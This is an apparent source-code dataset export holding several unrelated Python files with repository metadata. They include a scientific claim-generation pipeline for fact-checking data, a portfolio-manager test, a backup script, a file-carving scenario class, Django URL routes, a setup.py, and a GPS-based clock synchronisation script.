parser.add_argument("--q2c_model_name", help="Name of the model to use for question generation", required=True, type=str)
parser.add_argument("--fc_model_name", help="Name of the fact checking model", required=True,
default='roberta-large')
parser.add_argument("--fc_model_checkpoint", help="Name of the fact checking model", required=False,
default=None)
parser.add_argument("--external_corpus_file", help="Evidence corpus file", required=True,
type=str)
parser.add_argument("--internal_corpus_file", help="Other paragraphs from citance documents", required=True,
type=str)
parser.add_argument("--seed", help="Random seed", type=int, default=1000)
parser.add_argument("--num_beams", help="Number of beams for beam search", type=int, default=1)
parser.add_argument("--output_dir", help="Directory to output files", required=True, type=str)
args = parser.parse_args()
enforce_reproducibility(args.seed)
# See if CUDA available
device = torch.device("cpu")
if torch.cuda.is_available():
print("Training on GPU")
device = torch.device("cuda:0")
# Setup
nlp = spacy.load('en_core_sci_md')
# QG model setup
qg_model = args.qg_model_name
qg_tokenizer = AutoTokenizer.from_pretrained(qg_model)
qg_model = AutoModelForSeq2SeqLM.from_pretrained(qg_model)
# Q2C model setup
q2c_model = args.q2c_model_name
q2c_tokenizer = AutoTokenizer.from_pretrained(q2c_model)
q2c_model = AutoModelForSeq2SeqLM.from_pretrained(q2c_model)
# FC model setup
fc_tokenizer = AutoTokenizer.from_pretrained(args.fc_model_name)
fc_model = JointParagraphClassifier(args.fc_model_name, 1024,
0.0)
state_dict = torch.load(args.fc_model_checkpoint)
# strict = false because of bert.embeddings.position_ids mismatch
fc_model.load_state_dict(state_dict, strict=False)
# Language model for negative claim generation
lm = AutoModelForCausalLM.from_pretrained('gpt2')
lm_tk = AutoTokenizer.from_pretrained('gpt2')
########### Run NER on input
with open(args.train_citances) as f:
citances = [json.loads(l) for l in f]
with open(args.val_citances) as f:
val_citances = [json.loads(l) for l in f]
with open(args.test_citances) as f:
test_citances = [json.loads(l) for l in f]
ner_data = []
output_claims = []
if not os.path.exists(f"{args.output_dir}"):
os.makedirs(f"{args.output_dir}")
save_dir = f"{args.output_dir}"
question_gen_input = get_named_entities(citances, nlp)
val_question_gen_input = get_named_entities(val_citances, nlp)
test_question_gen_input = get_named_entities(test_citances, nlp)
############ Generate questions from NER
qg_model.to(device)
preprocessor = partial(qg_data_preprocess, qg_tokenizer, 'local')
gen_dset_base = Dataset.from_dict(question_gen_input)
val_gen_dset_base = Dataset.from_dict(val_question_gen_input)
test_gen_dset_base = Dataset.from_dict(test_question_gen_input)
# Filter missing NER
#gen_dset_base = gen_dset_base.filter(lambda example: len(example['answers']) > 0)
gen_dset = gen_dset_base.map(preprocessor, batched=True)
val_gen_dset = val_gen_dset_base.map(preprocessor, batched=True)
test_gen_dset = test_gen_dset_base.map(preprocessor, batched=True)
data_collator = DataCollatorForSeq2Seq(
qg_tokenizer,
model=qg_model,
label_pad_token_id=-100,
padding='longest'
)
qg_trainer = CustomTrainer(
model=qg_model,
tokenizer=qg_tokenizer,
data_collator=data_collator
)
claim_gen_input = run_question_generation(qg_trainer, gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
val_claim_gen_input = run_question_generation(qg_trainer, val_gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
test_claim_gen_input = run_question_generation(qg_trainer, test_gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
qg_model.to('cpu')
############ Generate claims from questions
q2c_model.to(device)
preprocessor = partial(q2c_data_preprocess, q2c_tokenizer, 'citeworth')
gen_dset_base = Dataset.from_dict(claim_gen_input)
val_gen_dset_base = Dataset.from_dict(val_claim_gen_input)
test_gen_dset_base = Dataset.from_dict(test_claim_gen_input)
gen_dset = gen_dset_base.map(preprocessor, batched=True)
val_gen_dset = val_gen_dset_base.map(preprocessor, batched=True)
test_gen_dset = test_gen_dset_base.map(preprocessor, batched=True)
data_collator = DataCollatorForSeq2Seq(
q2c_tokenizer,
model=q2c_model,
label_pad_token_id=-100,
padding='longest'
)
q2c_trainer = CustomTrainer(
model=q2c_model,
tokenizer=q2c_tokenizer,
data_collator=data_collator
)
generated_claims, fc_claim_inputs = run_claim_generation(q2c_trainer, gen_dset, q2c_model, q2c_tokenizer, device, args.num_beams)
val_generated_claims, _ = run_claim_generation(q2c_trainer, val_gen_dset, q2c_model, q2c_tokenizer,
device, args.num_beams)
test_generated_claims, _ = run_claim_generation(q2c_trainer, test_gen_dset, q2c_model, q2c_tokenizer, device,
args.num_beams)
with open(f"{save_dir}/output_test_claims.jsonl", 'wt') as f:
for c in test_generated_claims:
f.write(json.dumps(c) + '\n')
with open(f"{save_dir}/output_scifact_dev_claims.jsonl", 'wt') as f:
for c in val_generated_claims:
f.write(json.dumps(c) + '\n')
q2c_model.to('cpu')
# Run FC model
fc_model.to(device)
#TODO get the data into the right format
fc_dev_set = SciFactParagraphBatchDataset(args.external_corpus_file, fc_claim_inputs,
sep_token=fc_tokenizer.sep_token, k=0, train=False)
rationale_predictions, stance_preds, stance_scores = predict(fc_model, fc_dev_set, 16, args.fc_model_name, fc_tokenizer, device)
rationale_json = rationale2json(fc_dev_set.samples, rationale_predictions)
stance_json = stance2json(fc_dev_set.samples, stance_preds, stance_scores)
stance_json = post_process_stance(rationale_json, stance_json)
merged_json = merge_json(rationale_json, stance_json)
fc_model.to('cpu')
# Rank predictions
sorted_fc_claims = sort_fc_claims(merged_json, generated_claims)
# Get new entities
citance_entity_map = defaultdict(lambda: {'text': '', 'entities': []})
original_claims = [c for c in sorted_fc_claims if c['score'] > 0.5]
for c in original_claims:
citance_entity_map[c['id']]['text'] = c['citance']
citance_entity_map[c['id']]['entities'].append(
(c['answer']['start'], c['answer']['start'] + len(c['answer']['text']), 'ENTITY'))
output_claims.extend(original_claims)
citances = [c for c in citances if c['doc_id'] not in citance_entity_map]
output_claims.extend([c for c in sorted_fc_claims if c['score'] <= 0.5])
with open(f"{save_dir}/added_claims.jsonl", 'wt') as f:
for c in output_claims:
f.write(json.dumps(c) + '\n')
csv_out = []
for c in output_claims:
csv_out.append([c['context'], c['citance'], c['generated_claim'], c['score']])
csv_pd = pd.DataFrame(csv_out, columns=['Context', 'Original Sentence', 'Claim', 'Score'])
csv_pd.to_csv(f"{save_dir}/ranked_claims.csv", index=None)
# Generate training data for fact checking
nli = pipeline('sentiment-analysis', model='roberta-large-mnli', return_all_scores=True, device=0)
# Generate data for scifact training/evaluation
for claim_set in tqdm(test_generated_claims):
neg_claims = kbin([claim_set['generated_claim']], nli, lm, lm_tk, device, 3)
claim_set['neg_claim'] = neg_claims[0][2] if neg_claims[0] is not None else None
# Get corpus so we can pick negative samples for NEI
paper_id_to_paragraph = defaultdict(list)
with open(args.internal_corpus_file) as f:
for l in f:
data = json.loads(l)
paper_id = data['doc_id'].split('_')[0]
paper_id_to_paragraph[paper_id].append(data)
# Pick 1/3 to be supports, 1/3 to be contradicts, and 1/3 to be NEI
def incgen():
val = 0
while True:
val += 1
yield val
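# incgen() is just a 1-based id counter for the exported claims; itertools.count(1) would be an equivalent drop-in.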
inc = incgen()
base_claims_and_evidence = []
for claim_set in test_generated_claims:
# Remove ID suffix to get original paper ID
original_doc_id = claim_set['id']
original_doc_id = original_doc_id[:original_doc_id.rfind('_')]
pos_claim = claim_set['generated_claim']
neg_claim = claim_set['neg_claim']
claim_type = random.randint(0, 2)
if claim_type == 0 or neg_claim is None:
base_claims_and_evidence.append({
'id': next(inc),
'claim': pos_claim,
'evidence': {str(doc_id): [{'sentences': [0], 'label': 'SUPPORT'}] for doc_id in
claim_set['evidence']},
'cited_doc_ids': claim_set['evidence']
})
elif claim_type == 1:
base_claims_and_evidence.append({
'id': next(inc),
'claim': neg_claim,
'evidence': {str(doc_id): [{'sentences': [0], 'label': 'CONTRADICT'}] for doc_id in
claim_set['evidence']},
'cited_doc_ids': claim_set['evidence']
})
elif claim_type == 2:
nei_type = random.randint(0, 1)
if nei_type == 0:
base_claims_and_evidence.append({
'id': next(inc),
'claim': pos_claim,
'evidence': {},
'cited_doc_ids': [original_doc_id]
})
else:
base_claims_and_evidence.append({
'id': next(inc),
'claim': neg_claim,
'evidence': {},
'cited_doc_ids': [original_doc_id]
})
with open(f"{save_dir}/scifact_claims.jsonl", 'wt') as f:
for c in base_claims_and_evidence:
f.write(json.dumps(c) + '\n')
| 534 | 0 | 49 |
01c534ccc2c61e899ecd5e35875b52f9b079b3b7 | 1,442 | py | Python | tests/core/context/test_add_portfolio_manager.py | investing-algorithms/investing-algorithm-framework | d579e142a3857e2e2dfb59b7d6e54202f7df5466 | ["Apache-2.0"] | 1 | 2019-12-23T21:23:45.000Z | 2019-12-23T21:23:45.000Z | tests/core/context/test_add_portfolio_manager.py | investing-algorithms/investing-algorithm-framework | d579e142a3857e2e2dfb59b7d6e54202f7df5466 | ["Apache-2.0"] | null | null | null | tests/core/context/test_add_portfolio_manager.py | investing-algorithms/investing-algorithm-framework | d579e142a3857e2e2dfb59b7d6e54202f7df5466 | ["Apache-2.0"] | 1 | 2019-12-23T21:23:50.000Z | 2019-12-23T21:23:50.000Z |
from typing import List
from investing_algorithm_framework import SQLLitePortfolioManager, Position, \
Order
from investing_algorithm_framework.core.exceptions import OperationalException
from investing_algorithm_framework.core.models import AssetPrice
from tests.resources import TestBase
| 32.044444 | 83 | 0.706657 |
from typing import List
from investing_algorithm_framework import SQLLitePortfolioManager, Position, \
Order
from investing_algorithm_framework.core.exceptions import OperationalException
from investing_algorithm_framework.core.models import AssetPrice
from tests.resources import TestBase
class MyPortfolioManagerOne(SQLLitePortfolioManager):
identifier = "BINANCE"
trading_currency = "USDT"
def get_positions(self, algorithm_context=None, **kwargs) -> List[Position]:
return [
Position(target_symbol="USDT", amount=1000)
]
def get_orders(self, algorithm_context, **kwargs) -> List[Order]:
pass
def get_prices(self, symbols, algorithm_context, **kwargs) -> List[AssetPrice]:
pass
class Test(TestBase):
def test(self) -> None:
self.algo_app.algorithm.add_portfolio_manager(MyPortfolioManagerOne())
self.assertTrue(
MyPortfolioManagerOne.identifier in
self.algo_app.algorithm._portfolio_managers
)
def test_duplicate(self):
self.algo_app.algorithm.add_portfolio_manager(MyPortfolioManagerOne())
self.assertTrue(
MyPortfolioManagerOne.identifier in
self.algo_app.algorithm._portfolio_managers
)
with self.assertRaises(OperationalException):
self.algo_app.algorithm.add_portfolio_manager(
MyPortfolioManagerOne()
)
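# The two tests above cover registration by identifier: the first asserts the manager is stored
# under its identifier ("BINANCE"), the second that registering a duplicate identifier raises
# OperationalException.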
| 875 | 170 | 100 |
e9db867e258c76d19aa20449fdb22216123194fa | 94 | py | Python | azkaban-jobtype-{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/v2/params.py | globocom/azkaban-jobtype-cookiecutter | f586441d990493734c663d26b0f6b54984ccc945 | ["MIT"] | null | null | null | azkaban-jobtype-{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/v2/params.py | globocom/azkaban-jobtype-cookiecutter | f586441d990493734c663d26b0f6b54984ccc945 | ["MIT"] | null | null | null | azkaban-jobtype-{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/auror_azkaban_jobtype_{{cookiecutter.project_name.lower()}}/v2/params.py | globocom/azkaban-jobtype-cookiecutter | f586441d990493734c663d26b0f6b54984ccc945 | ["MIT"] | null | null | null |
from auror_core.v2.params import Params
class {{cookiecutter.project_name}}(Params):
pass
| 23.5 | 44 | 0.776596 |
from auror_core.v2.params import Params
class {{cookiecutter.project_name}}(Params):
pass
| 0 | 0 | 0 |
a6e19736a54a93a571242f4a476a7420ab121d6e | 1,162 | py | Python | mywayback.py | jsyk/mywayback | df007383db01dd0cde3434ea9426e1decb211308 | ["MIT"] | null | null | null | mywayback.py | jsyk/mywayback | df007383db01dd0cde3434ea9426e1decb211308 | ["MIT"] | null | null | null | mywayback.py | jsyk/mywayback | df007383db01dd0cde3434ea9426e1decb211308 | ["MIT"] | null | null | null |
import sys, getopt
from os import path
import time
from configure import Configure
from scanner import FoundFile, Scanner
from checker import Checker
from taker import Taker
print("** Welcome to MyWayback! **")
args = sys.argv[1:]
if len(args) == 0:
print("ERROR: Missing command-line argument!")
exit(1)
targetbasedir = args[0]
print("Target directory: {}".format(targetbasedir))
snapshotname = time.strftime("%Y-%m-%d--%H-%M")
print("Snaphost name: {}".format(snapshotname))
cfg = Configure()
cfg.read_configdir(path.join(targetbasedir, 'config'))
print("Scan dirs (+):")
print(cfg.scandirs)
print("Skip dirs (-):")
print(cfg.skipdirs)
sca = Scanner()
#s.scan_dirtree('/home/jara/Dokumenty')
sca.scan_confdirs(cfg)
print()
print("SCANNER FINISHED: Number of found files: {}".format(sca.num_foundfiles))
print()
# for i in range(0, 10):
# ff = s.foundfiles.pop()
# print(ff.order, ff.fullname())
che = Checker(targetbasedir)
tak = Taker(targetbasedir, snapshotname)
batchsize = 1000
while sca.foundfiles or che.digestedfiles:
che.digest_files(sca, batchsize)
tak.take_files(che, batchsize)
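# Pipeline: Scanner finds files, Checker digests them, Taker copies them into the snapshot;
# the loop drains both work queues in batches of `batchsize`.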
print("** Finished a backup run with MyWayback! **")
| 22.784314 | 79 | 0.724613 |
import sys, getopt
from os import path
import time
from configure import Configure
from scanner import FoundFile, Scanner
from checker import Checker
from taker import Taker
print("** Welcome to MyWayback! **")
args = sys.argv[1:]
if len(args) == 0:
print("ERROR: Missing command-line argument!")
exit(1)
targetbasedir = args[0]
print("Target directory: {}".format(targetbasedir))
snapshotname = time.strftime("%Y-%m-%d--%H-%M")
print("Snaphost name: {}".format(snapshotname))
cfg = Configure()
cfg.read_configdir(path.join(targetbasedir, 'config'))
print("Scan dirs (+):")
print(cfg.scandirs)
print("Skip dirs (-):")
print(cfg.skipdirs)
sca = Scanner()
#s.scan_dirtree('/home/jara/Dokumenty')
sca.scan_confdirs(cfg)
print()
print("SCANNER FINISHED: Number of found files: {}".format(sca.num_foundfiles))
print()
# for i in range(0, 10):
# ff = s.foundfiles.pop()
# print(ff.order, ff.fullname())
che = Checker(targetbasedir)
tak = Taker(targetbasedir, snapshotname)
batchsize = 1000
while sca.foundfiles or che.digestedfiles:
che.digest_files(sca, batchsize)
tak.take_files(che, batchsize)
print("** Finished a backup run with MyWayback! **")
| 0 | 0 | 0 |
ffb2de928830135b7881a885266b8f6b7bc6914f | 2,321 | py | Python | woodblock/scenario.py | fkie-cad/woodblock | ac4a590744021540fc7388765629bf3367f89e2e | ["MIT"] | 8 | 2019-08-14T08:57:21.000Z | 2022-02-18T01:35:24.000Z | woodblock/scenario.py | fkie-cad/woodblock | ac4a590744021540fc7388765629bf3367f89e2e | ["MIT"] | 1 | 2020-01-24T23:38:36.000Z | 2020-02-27T14:00:59.000Z | woodblock/scenario.py | fkie-cad/woodblock | ac4a590744021540fc7388765629bf3367f89e2e | ["MIT"] | 2 | 2019-08-22T15:30:53.000Z | 2020-01-24T23:11:34.000Z |
"""This module contains file carving scenario related classes and functions."""
from multimethod import multimethod
import woodblock.fragments
class Scenario(list):
"""This class represents a file carving scenario.
A scenario contains fragments in a certain order.
Args:
name: The name of the scenario.
"""
@multimethod
def add(self, fragment: woodblock.fragments.FillerFragment):
"""Add a filler fragment to the scenario.
Args:
fragment: The fragment to be added.
"""
self.append(fragment)
@multimethod
def add(self, fragment: woodblock.fragments.FileFragment): # pylint: disable=function-redefined
"""Add a file fragment to the scenario.
Args:
fragment: The fragment to be added.
"""
self.append(fragment)
@multimethod
def add(self, fragments: list): # pylint: disable=function-redefined
"""Add a list of fragments to the scenario.
Args:
fragments: The list of fragments to be added.
"""
self._add_from_iterable(fragments)
@multimethod
def add(self, fragments: tuple): # pylint: disable=function-redefined
"""Add a tuple of fragments to the scenario.
Args:
fragments: The tuple of fragments to be added.
"""
self._add_from_iterable(fragments)
@property
def metadata(self) -> dict:
"""Return the scenario metadata."""
meta = {'name': self.name, 'files': list()}
files = dict()
for frag in self:
frag_meta = frag.metadata
file_id = frag_meta['file']['id']
if file_id not in files:
files[file_id] = {'original': frag_meta['file'], 'fragments': list()}
files[file_id]['fragments'].append(frag_meta['fragment'])
meta['files'] = list(files.values())
self._sort_fragments_by_number(meta)
return meta
@staticmethod
| 29.379747 | 100 | 0.612236 |
"""This module contains file carving scenario related classes and functions."""
from multimethod import multimethod
import woodblock.fragments
class Scenario(list):
"""This class represents a file carving scenario.
A scenario contains fragments in a certain order.
Args:
name: The name of the scenario.
"""
def __init__(self, name: str):
list.__init__([])
self.name = name
@multimethod
def add(self, fragment: woodblock.fragments.FillerFragment):
"""Add a filler fragment to the scenario.
Args:
fragment: The fragment to be added.
"""
self.append(fragment)
@multimethod
def add(self, fragment: woodblock.fragments.FileFragment): # pylint: disable=function-redefined
"""Add a file fragment to the scenario.
Args:
fragment: The fragment to be added.
"""
self.append(fragment)
@multimethod
def add(self, fragments: list): # pylint: disable=function-redefined
"""Add a list of fragments to the scenario.
Args:
fragments: The list of fragments to be added.
"""
self._add_from_iterable(fragments)
@multimethod
def add(self, fragments: tuple): # pylint: disable=function-redefined
"""Add a tuple of fragments to the scenario.
Args:
fragments: The tuple of fragments to be added.
"""
self._add_from_iterable(fragments)
def _add_from_iterable(self, iterable):
self.extend(iterable)
@property
def metadata(self) -> dict:
"""Return the scenario metadata."""
meta = {'name': self.name, 'files': list()}
files = dict()
for frag in self:
frag_meta = frag.metadata
file_id = frag_meta['file']['id']
if file_id not in files:
files[file_id] = {'original': frag_meta['file'], 'fragments': list()}
files[file_id]['fragments'].append(frag_meta['fragment'])
meta['files'] = list(files.values())
self._sort_fragments_by_number(meta)
return meta
@staticmethod
def _sort_fragments_by_number(meta):
for file in meta['files']:
file['fragments'] = list(sorted(file['fragments'], key=lambda x: x['number']))
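# Minimal usage sketch (illustrative only; `frag_a` and `frag_b` stand for woodblock fragment
# objects such as FileFragment or FillerFragment instances):
#   scenario = Scenario('two fragments')
#   scenario.add(frag_a)
#   scenario.add([frag_b])
#   meta = scenario.metadata  # {'name': 'two fragments', 'files': [...]}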
| 249 | 0 | 80 |
4c531e2c199cc4a3c924b62cbb1447d4a462d527 | 490 | py | Python | webdev/users/urls.py | h-zanetti/real-estate-manager | a526cfccf9589629c03ac7e3afe760ade0e48b7d | ["MIT"] | null | null | null | webdev/users/urls.py | h-zanetti/real-estate-manager | a526cfccf9589629c03ac7e3afe760ade0e48b7d | ["MIT"] | 22 | 2021-04-23T19:03:10.000Z | 2021-08-13T14:57:37.000Z | webdev/users/urls.py | h-zanetti/real-estate-manager | a526cfccf9589629c03ac7e3afe760ade0e48b7d | ["MIT"] | null | null | null |
from django.urls import path
from . import views
from django.contrib.auth import views as auth_views
urlpatterns = [
path('registro/', views.registro, name='registro'),
path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('minhas_reservas/', views.minhas_reservas, name='minhas_reservas'),
path('ser_anfitriao/', views.ser_anfitriao, name='ser_anfitriao'),
]
| 44.545455 | 97 | 0.732653 |
from django.urls import path
from . import views
from django.contrib.auth import views as auth_views
urlpatterns = [
path('registro/', views.registro, name='registro'),
path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('minhas_reservas/', views.minhas_reservas, name='minhas_reservas'),
path('ser_anfitriao/', views.ser_anfitriao, name='ser_anfitriao'),
]
| 0 | 0 | 0 |
b47cac1ac9a109cefa86744f5d3542882c843b14 | 1,557 | py | Python | setup.py | SYAN83/pytorch-learn | f734baf0b837d7c87647ab43ca5de9248849dfa9 | ["MIT"] | null | null | null | setup.py | SYAN83/pytorch-learn | f734baf0b837d7c87647ab43ca5de9248849dfa9 | ["MIT"] | 1 | 2019-02-24T07:39:02.000Z | 2019-02-24T07:39:02.000Z | setup.py | SYAN83/pytorch-learn | f734baf0b837d7c87647ab43ca5de9248849dfa9 | ["MIT"] | null | null | null |
from setuptools import setup
import re
import setuptools  # needed for setuptools.find_packages() below
APP_NAME = 'ptlearn'
VERSION = '0.1'
if __name__ == '__main__':
check_version()
setup(
name=APP_NAME,
version=VERSION,
description='A Python machine learing library, based on PyTorch',
long_description=readme(),
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
],
url='https://github.com/SYAN83/pytorch-learn',
author='Shu Yan',
author_email='yanshu.usc@gmail.com',
license='MIT',
packages=setuptools.find_packages(exclude=['tests']),
install_requires=[
'torch>=1.0.0',
],
include_package_data=True,
zip_safe=False
)
| 27.315789 | 73 | 0.558125 |
from setuptools import setup
import re
import setuptools  # needed for setuptools.find_packages() below
APP_NAME = 'ptlearn'
VERSION = '0.1'
def readme():
with open('README.rst', 'r') as f:
return f.read()
def check_version():
global VERSION
# Get the version
version_regex = r'__version__ = ["\']([^"\']*)["\']'
with open('ptlearn/__init__.py', 'r') as f:
text = f.read()
match = re.search(version_regex, text)
if match:
VERSION = match.group(1)
else:
raise RuntimeError("No version number found!")
if __name__ == '__main__':
check_version()
setup(
name=APP_NAME,
version=VERSION,
description='A Python machine learing library, based on PyTorch',
long_description=readme(),
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
],
url='https://github.com/SYAN83/pytorch-learn',
author='Shu Yan',
author_email='yanshu.usc@gmail.com',
license='MIT',
packages=setuptools.find_packages(exclude=['tests']),
install_requires=[
'torch>=1.0.0',
],
include_package_data=True,
zip_safe=False
)
| 399 | 0 | 46 |
cdac9df18ec3645f342e324f40f6ff8659093533 | 6,170 | py | Python | utility/gps_and_states.py | mafavaron/MeteoFlux | a2fc66aac1faa97f12e07fba9bb3ef8aea60b5d7 | ["MIT"] | null | null | null | utility/gps_and_states.py | mafavaron/MeteoFlux | a2fc66aac1faa97f12e07fba9bb3ef8aea60b5d7 | ["MIT"] | null | null | null | utility/gps_and_states.py | mafavaron/MeteoFlux | a2fc66aac1faa97f12e07fba9bb3ef8aea60b5d7 | ["MIT"] | null | null | null |
#!/usr/bin/python
# Task to maintain system RTC aligned with GPS time, coming from a
# Teltonka RUT955 terminal.
import socket
import sys
import time
import os
import logging
import logging.handlers
if __name__ == "__main__":
logger = logging.getLogger('GPS_Task')
logger.setLevel(logging.DEBUG)
handler = logging.handlers.RotatingFileHandler(
"/mnt/logs/gps.log", maxBytes=1024*1024, backupCount=5)
logger.addHandler(handler)
logger.info(logString("*** Starting execution"))
oldTimeStamp = 0.0
isFirst = True
myOwnIP = getIP()
logger.info(logString("This station's inferred IP: %s" % myOwnIP))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
logger.info(logString("Socket allocated"))
try:
sock.bind((myOwnIP, 17050))
logger.info(logString("Socket opened on port 17050 (check on Teltonika if same)"))
except Exception as e:
logger.error(logString("*** Terminating execution - Error: socket not opened: %s" % str(e)))
sys.exit(1)
while True:
# Get status from /mnt/ramdisk/gps.csv
state = getState()
# Act, based on state
if state == 1: # Active
# Get most recent data from GPS pool
(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed) = getGpsData(sock, '192.162.1.1', 17050)
(rTimeStamp, iPriority, rLon, rLat, iHgt, iAng, iSat, iSpeed) = getMostRecentGpsLine(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed)
logger.info(logString("Last GPS fix: %f %f %f" % (rLat, rLon, iHgt)))
now = time.time()
deltaTime = abs(now - rTimeStamp)
if deltaTime > 10:
timeAlarm = "***"
setRTC(rTimeStamp)
logger.info(logString("RTC updated to GPS"))
else:
timeAlarm = ""
# Write GPS status data
f = open("/mnt/ramdisk/gps_state.txt", "w")
f.write("Time delta (RTC - GPS): %f %s\n" % (now - rTimeStamp, timeAlarm))
f.write("Lat, Lon: %f, %f\n" % (rLat, rLon))
f.write("Altitude: %d\n" % iHgt)
f.write("Angle: %d\n" % iAng)
f.write("Speed: %d\n" % iSpeed)
f.write("Satellites: %d\n" % iSat)
f.write("Message priority: %d\n" % iPriority)
f.close()
# Write positional data in computer-friendly form
f = open("/mnt/ramdisk/Position.csv", "w")
f.write("%f, %f, %d\n" % (rLat, rLon, iHgt))
f.close()
if isFirst:
isFirst = False
else:
if deltaTime > 60.0:
# No GPS updates ever since: force modem reboot....
logger.warning(logString("GPS is apparently blocked"))
isFirst = True
oldTimeStamp = 0.0
else:
oldTimeStamp = rTimeStamp
else: # Waiting: do nothing but waiting a little bit
time.sleep(5)  # brief pause while inactive (5 s is an assumed interval; the original call was missing its argument)
logger.info(logString("*** Terminating execution"))
| 25.92437 | 156 | 0.643598 |
#!/usr/bin/python
# Task to maintain system RTC aligned with GPS time, coming from a
# Teltonka RUT955 terminal.
import socket
import sys
import time
import os
import logging
import logging.handlers
def getIP():
IP = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
return IP
def setRTC(desiredTimeStamp):
timeString = time.strftime("%m%d%H%M%Y.%S", time.gmtime(desiredTimeStamp))
os.system("date -u %s" % timeString)
os.system("hwclock -w")
def toInt(byteArray):
i = len(byteArray)
value = 0
for b in byteArray:
value = value*256 + b
return(value)
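# toInt() folds the bytes most-significant-first (big-endian), matching how the AVL fields are
# sliced below; e.g. toInt(bytearray([0x01, 0x00])) == 256.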
def getGpsData(sock, remoteIP, remotePort):
# Get one data line, check it corresponds to the correct address, and if so pass to the next step
while True:
data, adr = sock.recvfrom(4096)
if adr[0] == remoteIP:
break
# Convert string to byte array form
byteArray = bytearray()
byteArray.extend(map(ord,data))
if len(byteArray) < 2:
return None
# Compose message size
msgSize = toInt(byteArray[0:2])
packetId = byteArray[2]*256 + byteArray[3]
packetType = byteArray[4]
avlId = byteArray[5]
imeiLen = byteArray[6]*256 + byteArray[7]
imei = byteArray[8:(8+imeiLen)].decode("utf-8")
codecId = byteArray[8+imeiLen]
numData = byteArray[9+imeiLen]
base = 10 + imeiLen
rvTimeStamp = []
ivPriority = []
rvLon = []
rvLat = []
ivHgt = []
ivAng = []
ivSat = []
ivSpeed = []
for i in range(numData):
timeStamp = toInt(byteArray[base:(8+base)])/1000.0
priority = byteArray[8+base]
lon = toInt(byteArray[(9+base):(13+base)])/10000000.0
lat = toInt(byteArray[(13+base):(17+base)])/10000000.0
hgt = toInt(byteArray[(17+base):(19+base)])
ang = toInt(byteArray[(19+base):(21+base)])
sat = byteArray[21+base]
speed = toInt(byteArray[(22+base):(24+base)])
zeros = toInt(byteArray[(24+base):(30+base)])
rvTimeStamp.append(timeStamp)
ivPriority.append(priority)
rvLon.append(lon)
rvLat.append(lat)
ivHgt.append(hgt)
ivAng.append(ang)
ivSat.append(sat)
ivSpeed.append(speed)
base += 30
# Send acknowledge packet
ackPacket = bytearray([0,5,0xCA,0xFE,1,0,0])
ackPacket[5] = avlId
ackPacket[6] = numData
sock.sendto(ackPacket, (remoteIP, remotePort))
outData = (rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed)
return(outData)
def getMostRecentGpsLine(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed):
# Find the highest time stamp in line set
rHighestTimeStamp = 0.0
idx = -1
for timeStampIdx in range(len(rvTimeStamp)):
timeStamp = rvTimeStamp[timeStampIdx]
if timeStamp > rHighestTimeStamp:
rHighestTimeStamp = timeStamp
idx = timeStampIdx
# Post: 'idx' is -1 in case no time stamp was found, or the index of
# largest value
if idx < 0:
return (-9999.9, -9999, -9999.9, -9999.9, -9999, -9999, -9999, -9999)
# Get data
return (
rvTimeStamp[idx],
ivPriority[idx],
rvLon[idx],
rvLat[idx],
ivHgt[idx],
ivAng[idx],
ivSat[idx],
ivSpeed[idx]
)
def logString(string):
return "%s - %s" % (time.asctime(), string)
def getState():
# Assume active state
state = 1
# Get the desired state
try:
sf = open("/mnt/ramdisk/gps.csv", "r")
stateNames = sf.readlines()
sf.close()
if len(stateNames) > 0:
stateName = stateNames[0][:-1] # Get first line up to and excluding
if stateName == "active":
state = 1
else:
state = 0
except:
state = 1
return state
if __name__ == "__main__":
logger = logging.getLogger('GPS_Task')
logger.setLevel(logging.DEBUG)
handler = logging.handlers.RotatingFileHandler(
"/mnt/logs/gps.log", maxBytes=1024*1024, backupCount=5)
logger.addHandler(handler)
logger.info(logString("*** Starting execution"))
oldTimeStamp = 0.0
isFirst = True
myOwnIP = getIP()
logger.info(logString("This station's inferred IP: %s" % myOwnIP))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
logger.info(logString("Socket allocated"))
try:
sock.bind((myOwnIP, 17050))
logger.info(logString("Socket opened on port 17050 (check on Teltonika if same)"))
except Exception as e:
logger.error(logString("*** Terminating execution - Error: socket not opened: %s" % str(e)))
sys.exit(1)
while True:
# Get status from /mnt/ramdisk/gps.csv
state = getState()
# Act, based on state
if state == 1: # Active
# Get most recent data from GPS pool
(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed) = getGpsData(sock, '192.162.1.1', 17050)
(rTimeStamp, iPriority, rLon, rLat, iHgt, iAng, iSat, iSpeed) = getMostRecentGpsLine(rvTimeStamp, ivPriority, rvLon, rvLat, ivHgt, ivAng, ivSat, ivSpeed)
